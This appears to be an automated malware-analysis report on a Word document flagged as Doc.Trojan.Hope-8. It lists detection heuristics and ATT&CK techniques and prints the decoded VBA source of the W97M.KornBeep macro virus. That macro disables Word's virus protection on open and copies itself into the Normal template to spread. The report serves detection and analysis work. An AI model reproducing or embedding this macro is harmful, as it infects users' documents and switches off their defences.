MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro that executes automatically via the Document_Open subroutine. The macro appears to be designed to check for existing infections and potentially install itself or download a secondary payload. The ClamAV detection 'Doc.Trojan.Hope-8' and the presence of a Document_Open macro strongly indicate malicious intent.
Heuristics 3
-
ClamAV: Doc.Trojan.Hope-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hope-8
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 844 bytes |
SHA-256: 4f5468fb0db190940e0b4c3986747a2422a61924d52b62b4051468050e8134b4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'W97M.KornBeep v1.6 sat 9.30 am july 31 99 [SW/LZ0/DVC?] Options.VirusProtection = 0 'helo 2 skammy, lys kovick, mkvg, virtual life, trevelyan... =) If NormalTemplate = MacroContainer Then Set x = ActiveDocument.VBProject.vbcomponents.Item(1).codemodule Else Set x = NormalTemplate.VBProject.vbcomponents.Item(1).codemodule 'Korn! =) determination If x.countoflines <> 5 Then x.deletelines 1, x.countoflines: x.addfromstring MacroContainer.VBProject.vbcomponents.Item(1).codemodule.lines(1, 5) Else Beep 'installation check/infection/payload! End Sub 'the end =) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.